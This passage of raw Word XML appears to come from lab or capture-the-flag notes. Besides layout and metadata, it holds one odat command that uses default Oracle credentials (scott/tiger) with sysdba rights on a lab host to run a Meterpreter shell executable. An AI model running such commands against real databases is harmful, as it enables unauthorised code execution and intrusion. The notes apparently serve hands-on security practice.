          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ </w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter-shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006839CB">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299AB05" w14:textId="76C24053" w:rsidR="005560B6" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D967A83" wp14:editId="540D60E1">
            <wp:extent cx="5943600" cy="1194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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="152AB7A0" w14:textId="36FD672D" w:rsidR="006839CB" w:rsidRDefault="006839CB" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326C001E" w14:textId="71873C69" w:rsidR="00B458F3" w:rsidRDefault="00F10C93" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679CA39F" wp14:editId="1B930082">
            <wp:extent cx="5943600" cy="1922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1922145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C258965" w14:textId="7714CE44" w:rsidR="00F10C93" w:rsidRDefault="00F10C93" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7439FA2A" w14:textId="634FB66D" w:rsidR="00F10C93" w:rsidRDefault="0021382D" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165D4E38" wp14:editId="597F401C">
            <wp:extent cx="5943600" cy="951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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="041654C9" w14:textId="67BF46AF" w:rsidR="00385129" w:rsidRDefault="00385129" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30079319" w14:textId="77777777" w:rsidR="00385129" w:rsidRPr="005A5A44" w:rsidRDefault="00385129" w:rsidP="00B10E13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00385129" w:rsidRPr="005A5A4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6D2"/>
    <w:rsid w:val="000066D9"/>
    <w:rsid w:val="00035675"/>
    <w:rsid w:val="000C5905"/>
    <w:rsid w:val="000F2722"/>
    <w:rsid w:val="0021382D"/>
    <w:rsid w:val="00234A7E"/>
    <w:rsid w:val="00244A0C"/>
    <w:rsid w:val="002948B5"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00385129"/>
    <w:rsid w:val="00453CD6"/>
    <w:rsid w:val="00470DAE"/>
    <w:rsid w:val="004A0911"/>
    <w:rsid w:val="004E7334"/>
    <w:rsid w:val="005560B6"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005A1218"/>
    <w:rsid w:val="005A5A44"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00651A04"/>
    <w:rsid w:val="006579FF"/>
    <w:rsid w:val="0066049A"/>
    <w:rsid w:val="00665F68"/>
    <w:rsid w:val="006839CB"/>
    <w:rsid w:val="00762BFE"/>
    <w:rsid w:val="007A157B"/>
    <w:rsid w:val="008B285F"/>
    <w:rsid w:val="00A32D31"/>
    <w:rsid w:val="00AB36D2"/>
    <w:rsid w:val="00AC5F14"/>
    <w:rsid w:val="00B10E13"/>
    <w:rsid w:val="00B11888"/>
    <w:rsid w:val="00B275EF"/>
    <w:rsid w:val="00B458F3"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD75F9"/>
    <w:rsid w:val="00E05CD9"/>
    <w:rsid w:val="00E2334B"/>
    <w:rsid w:val="00E95AA8"/>
    <w:rsid w:val="00F10C9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6449DBA1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CFAC0AC2-B4FF-6045-8FF9-C24FDD59D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253</Words>
  <Characters>1443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30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-21T03:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T17:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>